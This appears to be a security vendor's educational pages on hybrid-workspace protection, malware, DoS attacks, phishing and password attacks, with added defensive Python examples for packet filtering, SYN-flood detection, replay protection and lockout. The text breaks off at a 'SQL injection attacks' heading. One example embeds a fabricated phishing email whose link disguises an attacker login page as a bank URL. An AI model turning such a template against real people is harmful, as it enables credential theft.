Securing The Hybrid Workspace

With a more distributed workforce, your organization is exposed to a series of new threats. Everything must be monitored to ensure that if anything goes wrong, the issue does not lead to a massive data breach in your business.

Keeping your hybrid office setup safe can be challenging. By taking the time to understand the challenges early and addressing them before they become security emergencies, you will be saving your business a ton of money.

Secure access

Making sure that your team not only has a VPN to use, but also knows how to use it properly, is a critical first step in protecting your hybrid office setup. The best systems use an automated approach where team members use preconfigured devices that will not log in to your network without proper authentication. These setups give you more control over the protocols in place and remove human error from the process.

Strict access control for employees

Strict access control is needed for anyone who uses the network. At the basic level, you need multi-factor authentication (MFA). On top of strong authentication, you should implement role-based access control (RBAC) so that if an account is compromised, the damage inflicted on your IT assets is limited to what that role can reach.

With RBAC, employees can only access the data their roles require. This makes it harder for attackers to gain full access to business data: even if they compromise one account, what they can reach is limited to that role's permissions.

Disaster recovery and backup services

This is imperative for basically every organization, regardless of its office structure. A robust backup and recovery plan can save your organization many times over. It does not stop attackers from stealing data, but it lets you recover from ransomware and other destructive attacks, because you can wipe the affected systems and restore from backup, and it also protects you against natural disasters and hardware failure.

You need to make sure that you keep a full disaster recovery plan in place to cover any potential problems that can come up.

Network monitoring

Strong network monitoring practices help you catch problems before they become serious threats. With network monitoring, you are watching your network for anything unusual, suspicious activities, malicious code, or unauthorized access. When you take a proactive approach, you start noticing little things that might take down your network and you will be able to stop them in a timely manner.

Patch management

Keeping work-related devices up to date can be a simple way to reduce potential attack vectors. The challenge is that patch management can become a monumental task as your business and workforce evolve.

Patching your software regularly is mandatory because it will address security issues that exist in your system. These security issues can be exploited by perpetrators to gain unauthorized access to your network.

DNS Filtering

When your employees are working from home, outside the protection of the corporate firewall, a DNS filtering solution can help prevent malware infections, keeping your corporate data and your employees’ devices safe. By resolving users’ DNS queries through a cloud-based DNS security service, businesses can enforce web access policies, block known malicious domains, support regulatory compliance, and stop threats before a connection to the malicious site is even made.

Mobile Device Management (MDM)

MDM is hugely important with distributed workforces. It allows you to monitor and manage the devices your staff uses. If a device is lost or stolen, or something suspicious occurs on it, you can lock it down and wipe it before attackers have a chance to access the data (or your network). Mobile Device Management ensures that any device used by employees is as secure as possible. This helps a lot, especially if you have a bring-your-own-device policy in place.

IT Security Training

Creating good habits is crucial when it comes to a hybrid workforce. It is not enough to simply install security software and monitor your network. You need to make sure that your staff knows what good security practices look like. That’s where training sessions come in. You can’t rely on people reading through documentation and remembering everything.

Security training gives you and your team hands-on experience that helps you learn the best security practices. It includes security drills, like sending out fake phishing emails to employees to make sure the training sticks. All it takes is one employee not paying attention when they check their email to compromise your entire organization.

Looking for help securing your hybrid workspace?

We have been helping organizations secure their offices for more than 16 years and have the skill set necessary to implement strong remote working practices. We can also train your team on the best IT security practices and help create good habits that are going to keep your company safe.

As the world adapts to new ways of working, the security needs of these setups are slightly different from the needs of the traditional office structure and will continue to evolve.

Most Common Types Of Malware

Malware typically enters a network when a user clicks a dangerous link or opens an email attachment, or when an attacker exploits an unpatched vulnerability; these are the most common ways malicious software gets installed. The term malware covers many kinds of threats, including spyware, viruses, worms, trojans, and ransomware.

Malware and malicious files inside a computer system can:

  • Deny access to certain network components.
  • Obtain sensitive information from the hard drive.
  • Make the system inoperable.

Types of Malware

Ransomware is an increasingly popular type of malware that denies access to the victim’s data, threatening to publish or delete it unless a ransom is paid. Modern ransomware uses cryptoviral extortion: it encrypts the victim’s files so that decryption is infeasible without the key the attacker holds.

Viruses attach themselves to executable code or documents and replicate when the infected host is run. A companion virus, for example, creates a malicious file with the same name as a legitimate program but a different executable extension, such as .exe, so that the user or the system launches the malicious copy instead.

Worms are often delivered as email attachments and mail copies of themselves to every contact in the infected computer’s address book. Unlike viruses, they need no host program: they are self-contained and spread across networks and devices on their own, often by exploiting unpatched vulnerabilities. Worms are frequently used to overload email servers and conduct denial-of-service attacks.

Trojans are programs that masquerade as legitimate software in order to get installed. Unlike viruses, a trojan does not replicate itself; it is commonly used to establish a backdoor that gives the attacker remote access.

Spyware is software installed to collect data about users, their systems, or their browsing history and send it to the attacker, who can use the information for blackmail or to download and install further malicious programs.

Keyloggers are a type of spyware that records the victim’s keystrokes. Everything the victim types, including passwords and card numbers, is sent to the attacker and can be used for fraud, blackmail, or identity theft.

Which devices can be affected?

No device is immune to malware. Desktop and laptop computers are the traditional targets, and both Android and iOS mobile devices can be infected too. Many types of mobile-specific malware spread via SMS links (smishing) in addition to the standard email vectors.

Common symptoms of malware infection

The most common signs that your device has been compromised by malware are:

  • Slow device performance.
  • URL redirections: the user is sent to websites he or she did not intend to visit.
  • Fake infection warnings, frequently along with requests to buy some software to “fix” them (scareware).
  • Problems shutting down or restarting your device.
  • Frequent pop-up ads.

The more of these common symptoms you see, the higher the likelihood your device was infected.

How to protect your data against malware

Even though there are a lot of types of malware out there, there are solutions and tips your staff can implement to protect your business against such threats.

Protect your devices.

Keep your operating system and applications updated. Hackers look for vulnerabilities in old or outdated software, so make sure you install updates as soon as they become available.

Never click on a link in a pop-up. Close the window using the browser’s own controls, not a button inside the pop-up, and avoid the website that generated it.

Only install apps you need and use regularly. If you no longer use an app, it is advisable to uninstall it.

Use a mobile security solution. Mobile malware and adware campaigns are increasingly common, so make sure your mobile devices are protected by a reputable mobile security solution.

Do not lend out your smartphone or leave your computer unattended and unlocked. If your default settings have changed, or a new app has appeared that you did not install, treat it as a possible sign that spyware or a keylogger has been installed.

Avoid clicking unknown links. Whether it comes via email, a social account, or a text message, if a link seems suspicious, stay away from it.

Only use known and trusted websites, and be wary of sites without HTTPS. Remember, though, that the padlock only means the connection is encrypted, not that the site is legitimate: phishing sites use HTTPS too.

Keep an eye on emails requesting personal information. If an email appears to come from your bank and instructs you to click a link to reset your password or access your account, do not click it. Go directly to your online banking website/app and log in there.

Pay extra attention to downloads and other software purchases.

Make sure you purchase security software from respectable companies using their official stores.

Don’t use jailbroken or rooted devices for work; they bypass the platform’s security controls and put your data at risk.

When looking for your next favorite app, make sure you read app reviews first, utilize only official app stores, and if something looks fishy, it would be safer to avoid it.

If you are concerned that your device may be infected, run a scan using security software you trust.

Do not open an unexpected email attachment, even if it appears to come from a friend or someone you know; their account may have been compromised.

With these tips and reliable security software, you will be on your way to protecting your data and devices from all kinds of malware.

Denial-of-Service & Distributed Denial-of-Service Attacks

A denial-of-service attack overwhelms the system’s resources so that it cannot respond to service requests. A distributed denial-of-service attack is also an attack on system’s resources, but it is launched from a considerable number of other host machines that are infected by malicious software all controlled by the perpetrator.

Unlike attacks designed to gain or increase access, a denial-of-service attack gives the attacker no direct access to data. The motive is usually disruption (for instance of a business competitor, where the benefit to the attacker is real and measurable), extortion, or cover: a DoS attack can be used to take a system offline, or to distract the defenders, so that a different kind of attack can be launched.

There are several types of DoS and DDoS attacks. The most common are ping-of-death attacks, TCP SYN floods, teardrop attacks, smurf attacks, and volumetric floods generated by botnets.

Ping of death attacks

This attack sends a ping (ICMP echo request) whose reassembled size exceeds the 65,535-byte maximum of an IP packet. A packet that large cannot be sent in one piece, so the attacker splits the oversized payload into fragments that each look legal on the wire. When the target reassembles them, the result overflows the reassembly buffer, which historically crashed or rebooted the system.

Ping of death attacks can be blocked by a firewall (or a host network stack) that checks the total size a fragmented IP packet would reach before accepting its fragments; modern operating systems perform this check themselves.
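The size check described above, as an added example that is not code from the original page: a Python filter that computes the length a fragmented datagram would reach and drops every fragment of any datagram that would exceed 65,535 bytes. The fragment records and the two sample pings are constructed for the demo; a real filter would decode them from packets.

```python
"""Firewall-style size check for fragmented IP datagrams (ping of death).

Added example, not code from the original page. The fragment records are
constructed for illustration; a real filter would decode them from packets.
"""
from dataclasses import dataclass

MAX_IP_DATAGRAM = 65535   # largest Total Length an IPv4 datagram may have (16-bit field)


@dataclass(frozen=True)
class Fragment:
    ident: int              # IP Identification field, shared by all fragments of one datagram
    offset: int             # Fragment Offset field, in units of 8 bytes
    total_length: int       # Total Length field of this fragment (its header + its payload)
    ihl: int = 5            # header length in 32-bit words; 5 means a 20-byte header, no options
    more_fragments: bool = True


def payload_end(frag: Fragment) -> int:
    """Byte position where this fragment's payload ends in the reassembled datagram."""
    payload_len = frag.total_length - frag.ihl * 4
    return frag.offset * 8 + payload_len


def reassembled_length(frag: Fragment) -> int:
    """Total length the reassembled datagram needs to hold this fragment:
    one IP header plus all payload up to this fragment's end."""
    return frag.ihl * 4 + payload_end(frag)


def is_oversized(frag: Fragment) -> bool:
    """True if accepting this fragment would push the datagram past 65,535 bytes.

    This is the ping-of-death condition: the last fragment's offset plus its
    payload runs past the maximum, so a naive receiver overruns its
    reassembly buffer.
    """
    return reassembled_length(frag) > MAX_IP_DATAGRAM


def filter_fragments(frags):
    """Split fragments into (accepted, dropped).

    Every fragment sharing an Identification value with an oversized fragment
    is dropped, not just the offending piece, so the target never tries to
    reassemble a partial, corrupt datagram.
    """
    bad_ids = {f.ident for f in frags if is_oversized(f)}
    accepted = [f for f in frags if f.ident not in bad_ids]
    dropped = [f for f in frags if f.ident in bad_ids]
    return accepted, dropped


# Constructed traffic: a normal 2,000-byte ping split in two, and a classic
# ping of death whose final fragment starts at byte 65,480 and carries 38 bytes
# of payload (65,510 bytes of ping data + 8-byte ICMP header + 20-byte IP header
# = 65,538 bytes reassembled).
BENIGN_PING = [Fragment(ident=1, offset=0, total_length=1500),
               Fragment(ident=1, offset=185, total_length=520, more_fragments=False)]
PING_OF_DEATH = [Fragment(ident=7, offset=0, total_length=1500),
                 Fragment(ident=7, offset=8185, total_length=58, more_fragments=False)]

if __name__ == "__main__":
    accepted, dropped = filter_fragments(BENIGN_PING + PING_OF_DEATH)
    for f in dropped:
        print(f"drop id={f.ident} offset={f.offset}: reassembled {reassembled_length(f)} bytes")
    print(f"{len(accepted)} fragments accepted, {len(dropped)} dropped")
```

The check is done per fragment, before any reassembly state is allocated, which is what makes it cheap enough for a firewall; the Identification-based drop of the sibling fragments is what stops the target from holding a half-built datagram in memory until it times out.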

TCP SYN flood attacks

This type of attack aims to make a server unavailable to legitimate traffic by exhausting its connection resources. The attacker floods the target’s connection queue with initial connection requests (SYN packets), typically from spoofed source addresses, and never answers the SYN-ACK the victim sends back. Each half-open connection sits in the queue until it times out, and once the queue is full, new legitimate connections are refused.

To counter SYN floods, enable SYN cookies so the server keeps no state until the handshake completes, rate-limit inbound SYN packets at the firewall (blocking them outright would also block every legitimate new connection), increase the size of the connection queue, and shorten the timeout for half-open connections. Floods that exceed your link capacity need upstream or cloud-based scrubbing.
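An added example, not from the original page, of how a sensor or log analyzer could spot the half-open connections a SYN flood leaves behind. The event format, the flag shorthand and the sample log are constructed for the demo; the addresses come from the RFC 5737 documentation ranges.

```python
"""Detect SYN-flood sources from a constructed TCP event log.

Added example, not code from the original page. Events are (time_s, src_ip,
src_port, flags) tuples as a sensor might emit them; the flag strings are a
constructed shorthand ("S" = SYN from client, "A" = client's ACK completing
the handshake). Addresses come from the RFC 5737 documentation ranges.
"""
from collections import defaultdict


def build_sample_events():
    """Constructed traffic: two legitimate clients that complete their
    handshakes, one stale half-open entry far outside the window, and one
    host that sends 50 SYNs and never replies to the SYN-ACKs."""
    events = [
        (-100.0, "192.0.2.8", 33000, "S"),          # old half-open entry, long timed out
        (0.00, "203.0.113.5", 40001, "S"),
        (0.05, "203.0.113.5", 40001, "A"),          # handshake completed
        (0.20, "203.0.113.6", 40002, "S"),
        (0.26, "203.0.113.6", 40002, "A"),
    ]
    for i in range(50):                             # the flooder
        events.append((1.0 + i * 0.01, "198.51.100.9", 50000 + i, "S"))
    return events


def half_open_by_source(events, window_s=5.0, now=None):
    """Count half-open connections per source address.

    A SYN opens a pending entry for (src, sport); the client's ACK closes it.
    Entries older than window_s are ignored, mirroring the server's own SYN
    timeout. `now` defaults to the latest event time so that replaying a log
    gives a deterministic answer.
    """
    pending = {}
    for t, src, sport, flags in events:
        key = (src, sport)
        if flags == "S":
            pending[key] = t
        elif flags == "A":
            pending.pop(key, None)
    if now is None:
        now = max((t for t, *_ in events), default=0.0)
    counts = defaultdict(int)
    for (src, _sport), t in pending.items():
        if now - t <= window_s:
            counts[src] += 1
    return dict(counts)


def suspected_flooders(events, threshold=20, window_s=5.0):
    """Sources holding at least `threshold` half-open connections in the window."""
    counts = half_open_by_source(events, window_s)
    return sorted(src for src, n in counts.items() if n >= threshold)


def total_half_open(events, window_s=5.0):
    """Backlog pressure regardless of source. With randomly spoofed source
    addresses no single source crosses the threshold, so this aggregate is
    the number to alarm on (and the reason SYN cookies exist)."""
    return sum(half_open_by_source(events, window_s).values())


if __name__ == "__main__":
    events = build_sample_events()
    print("half-open per source:", half_open_by_source(events))
    print("suspected flooders:", suspected_flooders(events))
    print("total half-open in window:", total_half_open(events))
```

Per-source counting catches a single unspoofed flooder; a real SYN flood usually randomizes source addresses, which is why the aggregate count matters more than the per-source list and why the fix belongs in the kernel (SYN cookies) rather than in an address blocklist.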

Teardrop attacks

This attack sends fragmented IP packets whose fragment offsets overlap. The attacked system tries to reassemble them, mishandles the overlapping fragments, and crashes.

Modern operating systems are patched against teardrop and its variants. If you are running a system that cannot be patched, the commonly cited workaround is to disable SMBv2 and block TCP ports 139 and 445 at the perimeter.

Smurf attacks

By combining IP spoofing with Internet Control Message Protocol (ICMP) echo requests, attackers can overwhelm a target with traffic. The attacker sends echo requests whose source address is forged to be the victim’s address and whose destination is the broadcast address of a network. Every host on that network receives the request and sends its reply to the victim, so a single spoofed packet is multiplied by the number of hosts that answer. This process is easily automated to generate huge amounts of reflected traffic.

To protect your network from a smurf attack, disable IP-directed broadcasts on your routers so that echo requests addressed to a broadcast address are not forwarded to the hosts behind them. Also configure end systems not to respond to ICMP echo requests sent to broadcast addresses; most modern operating systems do this by default.


Botnets are networks of computers infected with malware and under an attacker’s control. The bots are directed to attack a victim’s system together, overwhelming its bandwidth and processing capacity. These DDoS attacks are difficult to trace because the bots are spread across many geographic locations and the operator hides behind them.

Spoofed traffic from botnets can be reduced with RFC 3704 ingress filtering (unicast reverse path forwarding), which drops packets whose source address could not legitimately have arrived on the interface they came in on, so forged sources never leave the network that originates them.

Another mitigation is black hole filtering, which discards traffic to the attacked address at the network edge before it reaches your infrastructure (at the cost of taking that address offline while the attack lasts).
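Added example of the RFC 3704 strict-mode check, not from the original page: the forwarding table, interface names and packets below are constructed. A router performs the same test against its real forwarding table on every inbound packet.

```python
"""RFC 3704 strict-mode ingress filtering (unicast reverse path forwarding).

Added example, not code from the original page. The routing table and the
packets are constructed; a router applies the same test using its real
forwarding table.
"""
import ipaddress

# Constructed forwarding table: prefix -> interface through which it is reached.
ROUTES = {
    ipaddress.ip_network("10.1.0.0/16"): "lan0",      # internal network
    ipaddress.ip_network("192.0.2.0/24"): "cust1",    # a customer's edge network
    ipaddress.ip_network("0.0.0.0/0"): "uplink",      # default route towards the Internet
}


def egress_interface(addr):
    """Longest-prefix match: the interface the router would use to reach addr."""
    matches = [net for net in ROUTES if addr in net]
    return ROUTES[max(matches, key=lambda net: net.prefixlen)]


def passes_strict_urpf(src_ip, arrived_on):
    """Strict mode (RFC 3704 section 2.2): accept only if the reverse path to
    the packet's source address leaves through the interface it arrived on.

    A packet from the Internet claiming an internal 10.1.x.x source fails: the
    route back to 10.1.x.x is lan0, not uplink, so the source is spoofed.
    """
    addr = ipaddress.ip_address(src_ip)
    if addr.is_multicast or addr.is_unspecified or addr.is_loopback:
        return False                      # never valid as a unicast source
    return egress_interface(addr) == arrived_on


def filter_ingress(packets):
    """Apply strict uRPF to (src_ip, arrived_on, dst_ip) records; return (forwarded, dropped)."""
    forwarded = [p for p in packets if passes_strict_urpf(p[0], p[1])]
    dropped = [p for p in packets if not passes_strict_urpf(p[0], p[1])]
    return forwarded, dropped


# Constructed packets: (source, ingress interface, destination)
SAMPLE_PACKETS = [
    ("10.1.2.3", "lan0", "203.0.113.80"),       # internal host browsing out: valid
    ("10.1.2.3", "uplink", "10.1.0.10"),        # internal source arriving from the Internet: spoofed
    ("203.0.113.7", "uplink", "10.1.0.10"),     # external client: valid
    ("192.0.2.10", "lan0", "10.1.0.10"),        # customer address appearing on the LAN port: spoofed
    ("224.0.0.1", "uplink", "10.1.0.10"),       # multicast as a source: always invalid
]

if __name__ == "__main__":
    forwarded, dropped = filter_ingress(SAMPLE_PACKETS)
    for pkt in dropped:
        print("drop", pkt)
    print(f"{len(forwarded)} forwarded, {len(dropped)} dropped")
```

Two caveats a practitioner would want: because the default route points at the uplink, anything not otherwise routed is accepted from the uplink (the filter protects your own prefixes from being spoofed inbound, it does not validate arbitrary Internet sources), and strict mode breaks on multi-homed links with asymmetric routing, where RFC 3704 loose mode (source must be routable via any interface) is the usual compromise.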


NetScout Systems, a network performance software vendor, reported that in the first half of 2021, threat actors launched 5.4 million DDoS attacks. More than 50% of those were DDoS extortion attacks in the financial industry.

According to Kaspersky, in the last quarter of 2021 the number of DDoS attacks increased by 52% compared to the previous quarter and was 4.5 times higher than in Q4 2020.

As businesses and financial institutions evolve, it is essential to have a cybersecurity strategy in place that includes not only professional human intervention, but also automated solutions that can detect and block modern DDoS attacks.

Types Of Cybersecurity Attacks

A cyberattack is a deliberate attempt to breach the information system of an individual or an organization. Below we describe some of the most common types of cyberattacks.

Man-in-the-middle (MitM) attacks

This type of attack occurs when an attacker inserts themselves into a client-server exchange or other private communication, relaying and possibly altering the traffic between two parties who believe they are talking directly to each other. The most common forms are the following.

Session hijacking occurs when an attacker takes over an established session between a trusted client and a server, for example by stealing the session token (cookie) or by spoofing the trusted client’s IP address and sequence numbers. If the server continues the session with the attacker, the attack has succeeded.

IP spoofing forges the source address of packets so they appear to come from a trusted host (or from random addresses, to hide the attacker’s real location). IP, the Internet Protocol, is the set of rules governing how data is addressed and routed across the internet or a local network; the IP address identifies each device so data can be delivered to it.

To defend against spoofing, organizations use ingress filtering that drops packets whose source address could not have arrived on that interface, and deep packet inspection (DPI) solutions that analyze all headers and the payload, not just the IP address.

A replay attack occurs when an attacker intercepts and records a valid communication and later resends it, in whole or in part, to impersonate one of the participants, for example by re-submitting a captured authentication or payment message.

To counter such attacks, security teams use session timestamps and a cryptographic nonce (a “number used once”): a random value that is valid for a single exchange, so that a recorded message is rejected the second time it arrives.
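The timestamp-and-nonce defense described above, as an added example that is not part of the original page. The message layout, the shared key and the controllable clock are constructed for the demo; the exchange shows both sides and the three ways a replayed or altered message is rejected.

```python
"""Replay protection with an HMAC, a timestamp and a single-use nonce.

Added example, not code from the original page. The message format, the
shared key and the injectable clock are constructed; the technique
(authenticate, then check freshness, then check the nonce) is the one the
text describes.
"""
import hashlib
import hmac
import json
import secrets
import time


def canonical(payload: dict) -> bytes:
    """Deterministic serialisation so client and server sign the same bytes."""
    return json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()


class Client:
    def __init__(self, key: bytes, now=time.time):
        self.key, self.now = key, now

    def send(self, body: dict) -> dict:
        """Attach a timestamp and a fresh 128-bit nonce, then sign body+ts+nonce."""
        msg = {"body": body, "ts": int(self.now()), "nonce": secrets.token_hex(16)}
        msg["tag"] = hmac.new(self.key, canonical(msg), hashlib.sha256).hexdigest()
        return msg


class Server:
    def __init__(self, key: bytes, now=time.time, max_skew_s=30):
        self.key, self.now, self.max_skew_s = key, now, max_skew_s
        self.seen = {}            # nonce -> timestamp it arrived with

    def _prune(self, now: int) -> None:
        """Forget nonces too old to pass the timestamp check anyway, so the
        cache stays bounded without weakening replay detection."""
        cutoff = now - self.max_skew_s
        self.seen = {n: ts for n, ts in self.seen.items() if ts >= cutoff}

    def receive(self, msg: dict) -> str:
        # 1. Authenticate first: unauthenticated input must not be able to
        #    poison the nonce cache or influence anything else.
        unsigned = {k: v for k, v in msg.items() if k != "tag"}
        expected = hmac.new(self.key, canonical(unsigned), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, msg.get("tag", "")):
            return "rejected: bad signature"
        # 2. Freshness: a captured message stops being valid after max_skew_s,
        #    which also bounds how long nonces must be remembered.
        now = int(self.now())
        if abs(now - msg["ts"]) > self.max_skew_s:
            return "rejected: stale timestamp"
        # 3. Uniqueness: within the window, each nonce is accepted exactly once.
        self._prune(now)
        if msg["nonce"] in self.seen:
            return "rejected: replayed nonce"
        self.seen[msg["nonce"]] = msg["ts"]
        return "accepted"


def demo() -> list:
    """Run the exchange with a controllable clock; returns the list of outcomes."""
    key = b"constructed-shared-secret"           # in practice: provisioned out of band
    clock = [1_700_000_000.0]
    now = lambda: clock[0]
    client, server = Client(key, now), Server(key, now)
    outcomes = []

    transfer = client.send({"from": "alice", "to": "bob", "amount": 50})
    outcomes.append(server.receive(transfer))       # accepted
    outcomes.append(server.receive(transfer))       # attacker resends it: replayed nonce
    tampered = dict(transfer, body={"from": "alice", "to": "mallory", "amount": 50})
    outcomes.append(server.receive(tampered))       # attacker edits it: bad signature
    later = client.send({"from": "alice", "to": "bob", "amount": 5})
    clock[0] += 120                                 # attacker replays it two minutes later
    outcomes.append(server.receive(later))          # stale timestamp
    return outcomes


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Three design points carry the security: the tag is verified before anything else so an attacker cannot fill the nonce cache with garbage; the timestamp window is what allows the cache to be pruned safely (a nonce older than the window would be rejected as stale anyway); and in a deployment with several server instances the `seen` cache must be shared, otherwise a replay sent to a different instance succeeds. Clock skew between client and server must stay inside `max_skew_s`, so keep both synchronized with NTP.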

Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks

A denial-of-service attack overwhelms a system so that it cannot respond to service requests. Similarly, a DDoS attack targets the system’s resources, but it is launched from several host machines controlled by the perpetrator.

Unlike cyberattacks that are designed to penetrate a system to get unauthorized access, DoS attacks do not provide direct benefits for attackers. However, if the targeted resource belongs to a competitor, then the benefit to the attacker can be measured.

A DoS attack can also be used to take a system offline to facilitate a different kind of attack.

There are several types of DoS attacks, such as teardrop attacks, botnets, etc.

Drive-by download attacks

Drive-by download attacks are generally used to spread malware. Attackers look for insecure websites and inject malicious scripts into the HTML or server-side code (for example PHP) of some of their pages. These scripts install malware directly on the visitor’s device, or redirect the visitor to a second site controlled by the attackers that does so.

A drive-by download exploits a browser, browser plug-in, or application that is vulnerable because it has not been updated; unlike phishing, it requires nothing more than visiting the page.

To protect your organization against such attacks, you should keep your browsers and operating systems up to date and avoid loading unsecure, suspicious websites.

Phishing & spear phishing attacks

Unfortunately, phishing attacks are increasingly popular among hackers. This type of cyberattack usually involves sending emails that appear to be from trusted sources with the goal of gaining personal information or influencing victims into taking certain action.

Such an attack combines social engineering and technical methods. It could be an email attachment or a link to an illegitimate website that can trick you into downloading malware or disclosing personal information.

Spear phishing is a targeted type of phishing activity. Attackers closely investigate their targets and create messages that are personal and relevant. Therefore, spear phishing can be very hard to identify and even harder to defend against.

Hackers usually utilize email spoofing for conducting spear phishing attacks. Basically, they change the sender’s email address, making it appear as if it is coming from someone you know, maybe a manager (e.g. CEO fraud) or a colleague/partner.

To reduce the risk of being phished, you should apply the following suggestions:

Analyze any email you consider suspicious before acting on it.

Hover your mouse over a suspicious link, but do not click it. The browser or mail client shows the real destination URL, which often differs from the text displayed in the message.

Email headers record how a message reached your mailbox. The Reply-To and Return-Path headers should point to the same domain as the From address; when they lead somewhere else, treat the message as suspect (keeping in mind that legitimate mailing lists and marketing platforms sometimes differ too).
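The two checks above (header domains that disagree, and link text that does not match the real destination) as an added example, not code from the original page. The message is fabricated for illustration: example.com stands for the impersonated bank, and the .test domains and 203.0.113.9 belong to the imaginary attacker.

```python
"""Header and link checks for a suspicious email, run on a constructed message.

Added example, not code from the original page. The message below is
fabricated: example.com stands for the impersonated bank, the .test domains
and 203.0.113.9 belong to the imaginary attacker.
"""
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

RAW_EMAIL = """\
From: "Example Bank Security" <security@example.com>
Reply-To: <helpdesk@mail.example-support.test>
Return-Path: <bounces@mail.example-support.test>
To: victim@example.org
Subject: Action required: verify your account
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your access is limited. Please visit
<a href="http://203.0.113.9/login">https://www.example.com/login</a> to restore it.</p>
<p>Need help? Visit our <a href="https://www.example.com/help">Help Center</a>.</p>
</body></html>
"""


def domain_of(header_value) -> str:
    """'"Name" <user@Host>' -> 'host' (lower-cased); '' if no address present."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def header_findings(msg) -> list:
    """Reply-To and Return-Path domains that differ from the From domain.
    A mismatch is a signal, not proof: mailing lists legitimately differ too."""
    sender = domain_of(msg["From"])
    findings = []
    for header in ("Reply-To", "Return-Path"):
        dom = domain_of(msg[header])
        if dom and dom != sender:
            findings.append((header, dom))
    return findings


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_shown_in_text(text: str):
    """If the anchor text itself looks like a URL or domain, return the host it shows."""
    candidate = text if "://" in text else "http://" + text
    host = urlparse(candidate).hostname
    return host if host and "." in host and " " not in text else None


def link_findings(html_body: str) -> list:
    """Links whose visible URL points somewhere other than the real href, i.e.
    what hovering over the link would reveal. Returns (shown_host, real_host)."""
    collector = LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        shown, real = host_shown_in_text(text), urlparse(href).hostname
        if shown and real and shown != real:
            findings.append((shown, real))
    return findings


def analyze(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    html_body = body.get_content() if body is not None else ""
    return {"from_domain": domain_of(msg["From"]),
            "header_findings": header_findings(msg),
            "link_findings": link_findings(html_body)}


if __name__ == "__main__":
    for key, value in analyze(RAW_EMAIL).items():
        print(f"{key}: {value}")
```

The link check only fires when the visible text itself looks like a URL, because that is the case where the user is being shown one destination and sent to another; a link labelled “Help Center” carries no such promise and is left to the header checks and to domain reputation. On real mail, Return-Path is written by your receiving server, so it is a more reliable signal than Reply-To, which the sender controls.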

Password attacks

As we all know, passwords are the most used mechanism to authenticate to any information system. Access to a person’s password can be obtained by using social engineering, gaining access to a password database, etc.

Two of the most common password attacks are brute-force attacks and dictionary attacks.

A brute-force attack systematically tries many candidate passwords, either every combination of characters or, more commonly, lists of leaked passwords and variations built from the victim’s personal information (credential stuffing and password spraying are variants of this).

A dictionary attack uses a list of common words and known passwords to attempt to gain access to a user’s account, computer, or network.

To protect against dictionary or brute-force attacks, implement an account lockout or progressive-delay policy that blocks further attempts after a few invalid user/password combinations, combine it with multi-factor authentication, and screen new passwords against lists of known breached passwords. Note that lockout alone lets an attacker deliberately lock legitimate users out, so keep lockout durations finite and consider throttling by source address as well.
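The lockout policy described above, as an added example that is not code from the original page. The user store, the wordlist, the thresholds and the controllable clock are constructed for the demo; password hashing uses PBKDF2 from the standard library.

```python
"""Account lockout against dictionary and brute-force attacks.

Added example, not code from the original page. The user store, wordlist,
thresholds and the injectable clock are constructed for the demo.
"""
import hashlib
import hmac
import secrets
import time

# Constructed wordlist standing in for the attacker's dictionary.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "welcome",
                    "admin123", "iloveyou", "football", "monkey", "dragon"]


def make_record(password: str, iterations: int = 50_000) -> dict:
    """Salted PBKDF2-HMAC-SHA256 record as a real user store would hold it."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "hash": digest, "iterations": iterations}


def verify(record: dict, password: str) -> bool:
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["hash"])


_DUMMY = make_record("dummy")   # used for unknown users so timing does not leak which names exist


class Authenticator:
    """Locks an account for lockout_s seconds after max_failures consecutive bad passwords."""

    def __init__(self, users: dict, max_failures: int = 5, lockout_s: int = 900, now=time.time):
        self.users, self.max_failures, self.lockout_s, self.now = users, max_failures, lockout_s, now
        self.failures = {}        # username -> consecutive failure count
        self.locked_until = {}    # username -> time the lock expires

    def attempt(self, username: str, password: str) -> str:
        now = self.now()
        if self.locked_until.get(username, 0) > now:
            return "locked"                       # even the correct password is refused here
        record = self.users.get(username)
        if record is not None and verify(record, password):
            self.failures.pop(username, None)     # success resets the counter
            return "ok"
        if record is None:
            verify(_DUMMY, password)              # same work as a real check
        count = self.failures.get(username, 0) + 1
        self.failures[username] = count
        if count >= self.max_failures:
            self.locked_until[username] = now + self.lockout_s
            self.failures.pop(username, None)
            return "locked"
        return "invalid"


def dictionary_attack(auth: Authenticator, username: str, wordlist) -> list:
    """What the attacker sees: one result string per guess."""
    return [auth.attempt(username, guess) for guess in wordlist]


def demo():
    """Dictionary attack against 'alice', then the real user during and after the lock."""
    clock = [0.0]
    auth = Authenticator({"alice": make_record("correct horse battery staple")}, now=lambda: clock[0])
    attack = dictionary_attack(auth, "alice", COMMON_PASSWORDS)
    during_lock = auth.attempt("alice", "correct horse battery staple")   # legitimate user locked out too
    clock[0] += 901                                                       # 15-minute lock has expired
    after_lock = auth.attempt("alice", "correct horse battery staple")
    return attack, during_lock, after_lock


if __name__ == "__main__":
    attack, during_lock, after_lock = demo()
    print("attacker sees:", attack)
    print("real user during lock:", during_lock, "| after lock:", after_lock)
```

The demo also shows the downside the text warns about: while the account is locked, the legitimate user is refused as well, so an attacker who only wants to disrupt can do so with five wrong guesses. That is why the lock expires rather than persisting until an administrator intervenes, and why production systems add per-source throttling and MFA on top.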

SQL injection attacks

